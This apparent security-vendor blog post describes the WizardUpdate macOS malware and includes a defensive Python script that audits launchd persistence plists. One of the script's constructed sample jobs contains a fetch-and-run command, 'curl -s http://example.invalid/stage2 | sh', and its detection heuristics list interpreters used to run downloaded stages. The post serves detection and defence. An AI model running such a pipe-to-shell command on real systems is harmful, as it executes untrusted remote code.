Introduction
On October 22nd of this year, Sergiu Gatlan on BleepingComputer.com posted a story concerning new WizardUpdate malware capabilities and tactics for evading detection.
What Happened?
WizardUpdate has been around since at least November of 2020 and has been evolving to include secondary payload downloads from cloud sources and Gatekeeper bypasses.
WizardUpdate, also known as UpdateAgent and Vigram, is malware attackers use to gain access to Macs via ‘drive-by downloads.’ These are unintentional downloads triggered simply by visiting an infected site, and they are a “silent install”: the user sees no notification or other indication that anything was installed. Once installed, the malware collects and exfiltrates information about the system it is running on. It also creates folders and attempts to elevate the privileges of the account under which it resides.
As the infection progresses, it may download further malware, such as ‘Adload,’ which redirects search engine traffic to generate revenue for the attackers and continues to modify system settings to gain greater access. Once successfully installed, the malware maintains persistence by removing the install file’s quarantine attribute, running scheduled persistence jobs to ensure the software stays resident, and deleting its own files and folders once they are no longer needed.
However, one of the biggest threats is that attackers can use this malware as a foothold to deliver far more dangerous malware with little difficulty. Without prompt detection and quarantine or removal, this application could cause massive damage and financial stress for users and organizations.
It is also important to note that many of the samples found so far are signed with valid Developer IDs issued by Apple, so they pass default Gatekeeper settings. Unfortunately, at this time, there is no mention of how the malware developers obtained these IDs.
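The persistence behavior described above (scheduled jobs that keep the software resident, a second stage fetched from the network) leaves traces in the launchd plists macOS reads at login. The script below is an added example written for this article; it is not code from the BleepingComputer story, from Microsoft’s research, or from Northstarr. It audits the standard LaunchAgents and LaunchDaemons directories for jobs that execute from temporary or hidden paths, run an interpreter that pulls remote content, or re-run at very short intervals. The directory names are the real macOS locations; the heuristics and the three sample jobs are constructed for illustration and will not match every variant.

```python
"""Audit macOS launchd persistence plists for traits an updater-style
installer leaves behind. Added example, not vendor tooling. Runs anywhere
Python runs; on a Mac call audit() with no arguments to scan the real
directories in LAUNCH_DIRS."""
import os
import plistlib
import tempfile

# Directories launchd reads persistence jobs from on macOS.
LAUNCH_DIRS = [
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
]

# Locations a legitimate vendor agent rarely executes from (heuristic).
SUSPICIOUS_PATH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Interpreters commonly used to run a downloaded second stage (heuristic).
SUSPICIOUS_PROGRAMS = ("bash", "sh", "zsh", "curl", "osascript", "python", "python3")


def inspect_plist(path):
    """Return the reasons a launchd plist looks like malware persistence
    (empty list means nothing was flagged)."""
    reasons = []
    with open(path, "rb") as fh:
        try:
            job = plistlib.load(fh)
        except plistlib.InvalidFileException:
            return ["unparseable plist"]
    args = list(job.get("ProgramArguments") or [])
    if "Program" in job:
        args = [job["Program"]] + args
    if not args:
        return reasons
    exe = os.path.basename(args[0])
    if any(a.startswith(SUSPICIOUS_PATH_PREFIXES) for a in args):
        reasons.append("executes from a temporary or shared directory")
    # A hidden component anywhere in an absolute path (e.g. /tmp/.helper/run).
    if any(part.startswith(".") for a in args if a.startswith("/")
           for part in a.split("/") if part):
        reasons.append("uses a hidden path component")
    if exe in SUSPICIOUS_PROGRAMS and any("curl" in a or "http" in a for a in args):
        reasons.append("interpreter fetching remote content")
    interval = job.get("StartInterval")
    if isinstance(interval, int) and interval < 600:
        reasons.append("re-runs every %d s" % interval)
    return reasons


def audit(directories=LAUNCH_DIRS):
    """Map each flagged plist path to its reasons; directories that do not
    exist are skipped so the scan is safe to run on any host."""
    findings = {}
    for d in directories:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            full = os.path.join(d, name)
            reasons = inspect_plist(full)
            if reasons:
                findings[full] = reasons
    return findings


def build_sample_dir():
    """Write three constructed plists into a temp dir: one benign vendor
    agent, one modelled on a stage-two downloader, one running from a hidden
    temp path. Returns the directory so audit([dir]) can be run on it."""
    d = tempfile.mkdtemp(prefix="launchagents_")
    jobs = [
        {"Label": "com.example.backup",
         "ProgramArguments": ["/Applications/Backup.app/Contents/MacOS/agent"],
         "RunAtLoad": True},
        {"Label": "com.constructed.updater",
         "ProgramArguments": ["/bin/sh", "-c", "curl -s http://example.invalid/stage2 | sh"],
         "RunAtLoad": True, "StartInterval": 60},
        {"Label": "com.constructed.helper",
         "ProgramArguments": ["/tmp/.helper/run"], "RunAtLoad": True},
    ]
    for job in jobs:
        with open(os.path.join(d, job["Label"] + ".plist"), "wb") as fh:
            plistlib.dump(job, fh)
    return d


if __name__ == "__main__":
    # Demo on the constructed samples; replace with audit() on a real Mac.
    for path, why in audit([build_sample_dir()]).items():
        print(path, "->", "; ".join(why))
```

The quarantine-attribute removal the article mentions is a separate check: on a Mac, `xattr -p com.apple.quarantine <file>` on a recently downloaded installer should still return a value, and a freshly downloaded file that has none is worth a closer look. Treat every hit from this script as a triage lead rather than a verdict, since legitimate software occasionally runs from the same locations.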
Northstarr Recommendations
While Apple operating systems have historically been more secure than many others, they still have vulnerabilities. Northstarr doesn’t wait until the last minute to protect your devices and systems; we validate and install updates as they are made available. Our ACES platform also puts a great deal more protection for your network and systems between the outside world and you. See our website for more information on ACES. Until you do reach out to us, try these recommendations:
— Update your Mac systems to the latest version
— Ensure you are using the most up-to-date antivirus and anti-malware software
— Use multi-factor authentication
— Monitor your systems and networks for unusual activity